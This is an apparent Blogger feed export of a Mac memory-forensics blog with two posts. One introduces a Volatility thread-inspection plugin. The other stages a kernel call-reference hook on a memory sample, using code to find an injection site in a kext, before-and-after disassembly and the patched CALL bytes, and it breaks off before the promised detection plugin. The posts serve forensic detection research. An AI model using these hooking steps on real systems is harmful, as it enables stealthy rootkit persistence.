tag:blogger.com,1999:blog-47842848373992626262024-03-18T21:17:39.153-07:00What's in your silicon?siliconbladehttp://www.blogger.com/profile/15072042953000392149noreply@blogger.comBlogger14125tag:blogger.com,1999:blog-4784284837399262626.post-57738042223794585282014-11-15T23:21:00.000-08:002014-11-15T23:21:04.416-08:00Viewing Thread Information in Mac Memory<span style="font-family: Arial, Helvetica, sans-serif;">This a short post to talk about my mac_threads plugin. The plugin can be used to analyze process/task threads in an OS X system. The information provided by the plugin includes each thread’s registers, argument (exec string), stack information, start address, user id, debugging information, priority, and more. Threads can be viewed filtered by process id or can display threads for all processes.</span><br />
<br />
<a name='more'></a><br />
<b><span style="font-family: Arial, Helvetica, sans-serif;">Plugin Use Cases:</span></b><br />
<br />
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">The plugin can be used to find owner/uid of a thread.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">The plugin can be used to detect DTrace probing.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">The plugin can be used to detect hardware debugging.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">The plugin can be used to view thread execution state.</span></li>
</ul>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnO7bJvEuIPP6yaDpjccWm9lz8phuxEEJOGEziM1pP4sr9QX4jI6Ud2TyZYT7-ngYKglK7rcH1KbvL5yrOzmbtoTsQzJohlLIoa-kwgd632m0t_ZeCWoLx96YhT9I2ZUHQkWK3SPEDA54G/s1600/threads.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnO7bJvEuIPP6yaDpjccWm9lz8phuxEEJOGEziM1pP4sr9QX4jI6Ud2TyZYT7-ngYKglK7rcH1KbvL5yrOzmbtoTsQzJohlLIoa-kwgd632m0t_ZeCWoLx96YhT9I2ZUHQkWK3SPEDA54G/s1600/threads.png" height="100" width="400" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">You can grab the plugin from my <a href="https://github.com/siliconblade/volatility/blob/master/mac/threads.py" target="_blank">GitHub repository</a> [1].</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">References</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">[1] https://github.com/siliconblade/volatility/blob/master/mac/threads.py</span><br />
<div class="MsoListParagraphCxSpFirst" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<br /></div>
<!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]-->
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>JA</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
<w:UseFELayout/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="276">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]-->
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin:0in;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Cambria;
mso-ascii-font-family:Cambria;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Cambria;
mso-hansi-theme-font:minor-latin;}
</style>
<![endif]-->
<!--StartFragment--><!--EndFragment-->siliconbladehttp://www.blogger.com/profile/15072042953000392149noreply@blogger.com0tag:blogger.com,1999:blog-4784284837399262626.post-42294996330964497732014-11-15T23:06:00.000-08:002014-11-15T23:21:20.101-08:00Finding Call Reference Hooks in Mac Memory<div style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<br />
In this blog post the call reference to the function _vnode_pagein in the function _ps_read_file will be modified to show a call reference modification and and a Volatility Framework plugin to detect this type of hooking will be presented.<br />
<br />
<a name='more'></a><br />
Find a location to potentially inject the code, in this case 0xffffff7f89dba6e5<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">## This section gets the address for possible code injection in the com.vmware.kext.vmhgfs kext</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">#get address for the kernel extension (kext) list</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">p = self.addrspace.profile.get_symbol("_kmod")</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">kmodaddr = obj.Object("Pointer", offset = p, vm = self.addrspace)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">kmod = kmodaddr.dereference_as("kmod_info")</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">#loop thru list to find suitable target to place the trampoline in</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">while kmod.is_valid():</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> str(kmod.name)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if str(kmod.name) == "com.vmware.kext.vmhgfs":</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> mh = obj.Object('mach_header_64', offset = kmod.address,vm = self.addrspace)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> o = mh.obj_offset</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> # skip header data</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> o += 32</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> txt_data_end = 0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> # loop thru segments to find __TEXT</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> for i in xrange(0, mh.ncmds):</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> seg = obj.Object('segment_command_64', offset = o, vm = self.addrspace)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if seg.cmd not in [0x26]:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> for j in xrange(0, seg.nsects):</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> sect = obj.Object('section_64', offset = o + 0x48 + 80*(j), vm = self.addrspace)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> sect_name = "".join(map(str, sect.sectname)).strip(' \t\r\n\0')</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> # find __text section</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if seg.cmd == 0x19 and str(seg.segname) == "__TEXT" and sect_name == "__text":</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> print "{0:#10x} {1:#2x} {2} {3}".format(sect.addr,seg.cmd, seg.segname, sect_name)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> txt_data_end = sect.addr + sect.m('size') - 50</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> break</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if txt_data_end != 0:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> break</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> print "The fake function will be at {0:#10x}".format(txt_data_end)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> break</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> kmod = kmod.next</span><br />
<br />
The addresses for the functions in question in the original memory sample:<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Function Name<span class="Apple-tab-span" style="white-space: pre;"> </span>Original Address</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">_ps_read_file<span class="Apple-tab-span" style="white-space: pre;"> </span>0xffffff80086049b0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">_vnode_pagein<span class="Apple-tab-span" style="white-space: pre;"> </span>0xffffff80089be9c0</span><br />
<br />
The disassembly of the original _ps_read_file showing the call reference to _vnode_pagein:<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049b0 55 PUSH RBP</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049b1 4889e5 MOV RBP, RSP</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049b4 4156 PUSH R14</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049b6 53 PUSH RBX</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049b7 4883ec10 SUB RSP, 0x10</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049bb 4d89ce MOV R14, R9</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049be 4489c0 MOV EAX, R8D</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049c1 c1e80c SHR EAX, 0xc</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049c4 488d1d75a96a00 LEA RBX, [RIP+0x6aa975]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049cb ff0483 INC DWORD [RBX+RAX*4]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049ce 034f18 ADD ECX, [RDI+0x18]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049d1 488b3f MOV RDI, [RDI]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049d4 448b4d10 MOV R9D, [RBP+0x10]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049d8 48c7042400000000 MOV QWORD [RSP], 0x0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049e0 e8db9f3b00 CALL 0xffffff80089be9c0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049e5 89c1 MOV ECX, EAX</span><br />
<br />
<br />
Modify the CALL instruction to refer to the fake location (0xffffff7f89dba6e5):<br />
<br />
In e8db9f3b00, e8 is the call instruction and the rest is the relative location of the call reference (CALL address less the next offset).<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Original Reference<span class="Apple-tab-span" style="white-space: pre;"> </span>Fake Reference<span class="Apple-tab-span" style="white-space: pre;"> </span>Code to Write</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0x003B9FDB<span class="Apple-tab-span" style="white-space: pre;"> </span> 0x817B5D00<span class="Apple-tab-span" style="white-space: pre;"> </span>\xe8\x00\x5D\x7B\x81</span><br />
<br />
After we rewrite the code at the original CALL at 0xffffff80086049e0 the disassembly will look like the following:<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049b0 55 PUSH RBP</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049b1 4889e5 MOV RBP, RSP</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049b4 4156 PUSH R14</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049b6 53 PUSH RBX</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049b7 4883ec10 SUB RSP, 0x10</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049bb 4d89ce MOV R14, R9</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049be 4489c0 MOV EAX, R8D</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049c1 c1e80c SHR EAX, 0xc</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049c4 488d1d75a96a00 LEA RBX, [RIP+0x6aa975]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049cb ff0483 INC DWORD [RBX+RAX*4]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049ce 034f18 ADD ECX, [RDI+0x18]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049d1 488b3f MOV RDI, [RDI]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049d4 448b4d10 MOV R9D, [RBP+0x10]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049d8 48c7042400000000 MOV QWORD [RSP], 0x0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049e0 e8005d7b81 CALL 0xffffff7f89dba6e5</span><br />
